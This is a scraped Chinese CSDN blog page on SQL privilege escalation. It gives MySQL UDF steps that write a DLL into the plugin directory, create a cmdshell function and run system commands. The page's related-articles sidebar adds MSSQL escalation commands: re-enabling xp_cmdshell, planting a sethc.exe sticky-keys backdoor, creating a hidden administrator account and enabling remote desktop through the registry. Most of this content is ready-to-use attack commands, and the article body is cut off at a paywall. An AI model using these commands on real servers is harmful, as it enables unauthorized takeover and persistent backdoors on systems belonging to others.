SQL提权

最新推荐文章于 2024-07-13 22:05:55 发布
最新推荐文章于 2024-07-13 22:05:55 发布
阅读量956 收藏 2
点赞数
分类专栏: 漏洞 文章标签: UDF MOF SA 漏洞 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40801316/article/details/81702842
版权
本文介绍了SQL提权的方法,包括利用UDF(用户定义函数)手工创建cmd函数,通过MOF文件进行注册表提权,以及SA账户的相关提权技巧。涉及的关键步骤包括创建库目录、注入代码、启用扩展存储过程等,旨在探讨SQL服务器的安全隐患及防护措施。
摘要由CSDN通过智能技术生成

UDF手工提权辅助:

select @@basedir;  #查看mysql安装目录

select 'It is dll' into dumpfile 'C:\。。lib::';  #利用NTFS ADS创建lib目录

select 'It is dll' into dumpfile 'C:\。。lib\plugin::';  #利用NTFS ADS创建plugin目录

select 0xUDFcode into dumpfile 'C:\phpstu\MySQL\lib\plugin\mstlab.dll';  #导出udfcode,注意修改udfcode

create function cmdshell returns string soname 'mstlab.dll';   #用udf创建cmd函数,shell,sys_exec,sys_eval

select shell('cmd','net user');     #执行cmd命令

show variables like '%plugin%';     #查看plugin路径

小技巧:

1.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MySQL 注册表中ImagePath的值为mysql安装目录

2.my.ini中datadir的值是数据存放目录

3.UPDATE user set File_priv ='Y';  flush privileges; 强制加file权限

UDFcode x86:

MOF手工提权辅助:

最低0.47元/天 解锁文章
小向科技资源网
关注
专栏目录
1433提权工具sqlTools2.chs.rar
10-23
1、 未能找到存储过程'master..xpcmdshell' 这种情况我看到网上的方法是: 第一步先删除: drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 第二步恢复: dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 2、 原因: 126(找不到指定的模块。)。 修复方法: 第一步: dbcc dropextendedproc ("xp_cmdshell") 第二步先删除: drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 第三步恢复: dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 直接恢复,不管sp_addextendedproc是不是存在 3、 Error Message:SQL Server 阻止了对组件 'xp_cmdshell' 的 过程 'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。 修复方法:分离器上执行 EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 4、 net提权出现 拒绝访问 可以尝试一下net1 user 用户 密码 /add 如果net1也是拒绝访问可以copy一个shfit后门试试执行cmd命令:copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe 如果提示 复制1文件 哪么证明成功了。连接终端然后按5下shift看看蹦出来了什么。玩咔咔 资源管理器,现在只要手工加个用户就好了。 5、 建号 net user chenyu chenyu$ /add net localgroup administrators chenyu /add C:\WINDOWS\system32\dllcache\net1.exe user chenyu chenyu$ /add C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators chenyu /add 5、 开3389 execmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
SQL Server提权系列
2301_77152761的博客
04-11 243
CLR 为托管代码提供服务,例如跨语言集成、代码访问安全性、对象生存期管理以及调试和分析支持。编写存储过程、触发器、用户定义类型、用户定义函数(标量函数和表值函数)以及用户定义的聚合函数。3、设置项目属性,目标平台修改为需要的目标平台,如SQL Server 2012;6、填入代码以后进行编译,之后到编译目录下可以看到一个dacpac后缀的文件。4、右键项目,选择添加->新建项,新建SQL CLR C# 存储过程。7、双击此文件进行解压,将解压出一个名为mode.sql的文件。
简单的Mysql/Mssql应用程序提权
最新发布
m0_74326506的博客
07-13 2108
UDF是用户自定义函数,其为mysql的一个拓展接口,可以为mysql增添一些函数。比如mysql一些函数没有,则可以自己用UDF加函数进去,加了之后就可以创建使用。
SQL Server提权之xp_cmdshell
不曾扬帆,何以至远方
07-17 4404
sql server提权之xp_cmdshell
mssql提权总结
st3pby的博客
12-30 2720
mssql提权总结
MSSQL提权(多种方式)
qq_50854662的博客
05-05 2236
之前对MSSQL提权了解较少,所以在这里记录一些关于这类提权的几种姿势 1.xp_cmdshell提权 存储过程为数据库提供了强大的功能,其类似UDF,在MSSQL中xp_cmdshell可谓臭名昭著了。MSSQL强大的存储过程也为黑客提供了遍历,在相应的权限下,攻击者可以利用不同的存储过程执行不同的高级功能,如增加MSSQL数据库用户,枚举文件目录等等。而这些系统存储过程中要数xp_cmdshell最强大,通过该存储过程可以在数据库服务器中执行任意系统命令。MSSQL2005,2008等之后版本的MSSQ
SQL 提权 常用命令
09-11
SQL 提权 常用命令,大家可以考虑下将sqlserver的服务运行权限设置为普通用户,即可防止下面的提权
易语言 SQL提权工具 源码
09-16
【易语言 SQL提权工具 源码】是一款基于易语言开发的用于SQL Server 2000数据库系统的提权工具。源码的提供旨在帮助开发者理解和学习如何在特定环境中提升权限,通常在进行系统安全研究或者漏洞修复时会有用到。...
SQL综合利用工具 提权必备
06-13
"SQL综合利用工具 提权必备"这一标题暗示了我们讨论的是一个集多种功能于一体的SQL工具,对于系统管理员或者数据库开发者来说,这类工具在进行权限提升或系统管理时至关重要。 SQL Server是微软公司开发的一款企业...
渗透测试 提权
07-18
- **SQL Server提权**:通过调用`xp_cmdshell`存储过程来实现权限提升。 3. **第三方软件和服务提权**:利用非系统自带的应用程序和服务中存在的漏洞进行提权。 #### 三、Windows系统漏洞提权的详细步骤 1. **...
数据库提权--MSSQL
qq_45936617的博客
10-11 814
MSSQL是微软公司开发的数据库,又称为sql server数据库服务器。在基于微软开发的IIS中间件服务器开发的网站,通常使用的就是MSSQL数据库。常见的MSSQL数据库的提权方式有 xp_cmdshell提权、sp_oacrate提权、沙盒提权及JOB提权等,本文学习的是三种提权方式利用原理、利用条件以利用方法。
SQL Server 数据库常见提权总结
m0_64481831的博客
03-28 2654
前面总结了linux和Windows的提权方式以及Mysql提权,这篇文章讲讲SQL Server数据库的提权
利用1433端口及提权总结
人若有志,就不会在半坡停止。
08-31 1737
1、xp_configure设置 两个 show advanced options,xp_cmdshell 设置为1。--创建一张表yy,只有一个列a,类型为varchar。--创建一张表yy1,只有一个列y,类型为image。要求靶机实际:需要满足以下条件 (很少能满足)l --修改数据库恢复模式为 完整模式。将其加入Administrators组。--把操作日志备份到指定文件。利用xp_cmdshell 建立文件。--插入一句话木马到yy表里。--备份表到指定路径。--插入一句话到yy1表里。...
Windows提权:利用MSSQL数据库,Oracle数据库
qq_61553520的博客
05-30 1699
MSSQL数据库提权总结归纳:MSSQL数据库三种提权方式都是死的:固定得命令执行三种提权方式都是通过web权限查看配置文件的方式获取到MSSQL数据库的账号密码,再进行提权的,MSSQL数据库是默认允许外链的,我们获得sa账户密码后,可以直接远程登录数据库。再数据库的SQL语句执行环境进行提权的。Oracle数据库的利用就很简单,工具梭哈即可。
服务器管理员账号sa,一次利用MSSQLSA账户提权获取服务器权限
weixin_39542742的博客
07-29 991
遇到小人,把服务器整走了自己手里只有sql server的sa账号密码模糊记起之前用这个账户提权读取文件的事百度之,发现相关信息一堆堆各种工具也用了不少 发现不是语法错误就是权限不够无奈之下装了sql server r2直接来操作顺利连接上去,看到有master这个库。直奔重点去这里要用到的就是xp_cmdshell这个存储过程,算是mssqlsa权限下的提权利器,不过有经验的管理员一般都会用各...
SQLserver提权
一个普普通通的博客
04-17 2937
SQLserver提权
SQL Server 数据库提权的几种方法——提权教程
热门推荐
W小哥
01-20 1万+
一、简介 在利用系统溢出漏洞没有效果的情况下,可以采用数据库进行提权。 数据库提权的前提条件: 1、服务器开启数据库服务 2、获取到最高权限用户密码 (除Access数据库外,其他数据库基本都存在数据库提权的可能) 二、使用xp_cmdshell进行提权 xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重新开启它。 启用: EXEC sp_configure ‘show advanced opti
SQL Server手工注入方式
内心不种满鲜花就会长满杂草
01-04 6065
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法和提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系型数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
SQL2005之SA提权总结
weixin_34346099的博客
03-17 147
首先,看看xp_cmdshell存在不,不存在的话先恢复下。 Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;   然后,Exec master.dbo.xp_cmdshell 'net user' 持行命令。   SQL Serve...
sqlsever提权
05-12
SQL Server提权是指在SQL Server数据库服务器上通过一系列技术手段获取比当前操作权限更高的权限,从而实现对系统的控制。SQL Server提权的常见技术手段包括: 1. 利用弱口令:攻击者通过猜解或者暴力破解方式获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值